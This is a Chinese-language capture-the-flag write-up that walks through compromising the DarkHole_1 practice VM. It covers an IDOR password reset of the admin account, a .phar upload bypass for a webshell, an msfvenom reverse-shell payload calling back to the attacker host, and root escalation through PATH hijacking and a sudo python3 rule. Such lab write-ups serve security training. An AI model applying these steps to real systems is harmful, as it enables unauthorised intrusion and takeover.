DarkHole靶机渗透过程
准备环境
攻击机:Kali-Linux-2021.2
目标靶机:DarkHole_1
平台:VMware Workstation 16
均为NAT
模式
一、信息搜集
1.主机嗅探
Kali
和DarkHole_1
处于同一网段,查看Kali
当前IP
ifconfig
可知Kali
的IP
为192.168.183.128/24
,进行网段扫描
netdiscover -r 192.168.183.0/24
扫描结果显示靶机的IP
地址为192.168.183.132
2.端口扫描
对靶机进行端口扫描
nmap -A -p- 192.168.183.132
扫出靶机开放端口为22
和80
端口 | 服务 |
---|---|
22 | SSH |
80 | Http(Apache/Ubuntu) |
3.访问其web页面
发现网页右上角有Login
,点击转到登录界面
没有发现其他有价值信息
二、漏洞挖掘
1.目录扫描
对靶机web
进行目录扫描
dirsearch -u http://192.168.183.132
发现以下目录
对config
目录进行访问
存在一个名为database.php
的文件,但没有读取权限
访问dashboard.php
页面
提示无权限进行访问,估计应该是需要登陆
访问upload
目录
发现存在名为d.jpg
的图片,对其进行查看
将此图拖入WinHex
中查看是否含有隐藏信息
其实可以发现其中貌似并没有任何有价值的信息
2.后台渗透
刚才目录扫描时,发现有注册页面,对其访问
发现当username
为admin
时,会提示用户admin
已存在
先随便注册个用户并进入该用户后台
可以发现有个更改密码的选项,可以尝试在修改的同时抓个包
可知现在这个用户的id
为2
,猜测用户admin
的id
为1
,尝试修改是否能达到更改admin
密码的目的
在更改id
之后,返回结果已回显密码已被更改,尝试使用用户amdin
进行登录
3.拿到webshell
1.中国蚁剑之一句话木马
发现admin
的后台有文件上传,推测应该有文件上传漏洞,测试使用一句话木马进行上传
但上传时报错,提示只能上传图片类的文件
经测试将后缀php改为jpg之后能上传,最终发现phar
文件可以绕过上传检测,将一句话木马上传之后,使用中国蚁剑对其链接,可拿到后台
完成拿shell
2.msf之反弹shell
用msfvenom
生成免杀反弹shell
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.225.128 lport=9999 -e -f raw > msfvenom.phar
将该木马通过admin
的后台上传至靶机,并且在msf
中启动监听
# 使用监听模块
use exploit/multi/handler
# 设置本地监听服务器
set lhost 192.168.225.128
# 设置本地监听端口
set lport 9999
# 设置监听有效载荷
set patload php/meterpreter_reverse_tcp
# 查看配置信息
show options
# 运行
run
访问刚上传的木马文件,出现回显
完成拿shell
4.提权
发现用户john
目录下有可执行的toto
文件
尝试执行toto
文件
./toto
由回显可知,文件toto
是以用户john
的身份运行命令id
编辑id
文件,写入/bin/bash
,将原有的路径写入到环境变量中,再次执行toto
文件就会获得john
的shell
echo '/bin/bash' > /tmp/id
chmod 777 /tmp/id
export PATH=/tmp:$PATH
./toto
password
文件下为用户john
的密码,可使用ssh
登录上去
cat password
查看user.txt
可拿到第一个flag
cat user.txt
查看file.py
发现该文件为空
cat file.py
查看用户john
所拥有的权限
sudo -l
发现可以用root
身份使用python3
命令执行file.py
文件
可以写入shell到file.py文件中,然后使用sudo命令执行
echo "import os;os.system('/bin/bash')" > file.py
执行file.py
sudo python3 /home/john/file.py
进入root
家目录查看文件
cd ~ && ls -lha
最后的flag
值在root.txt
中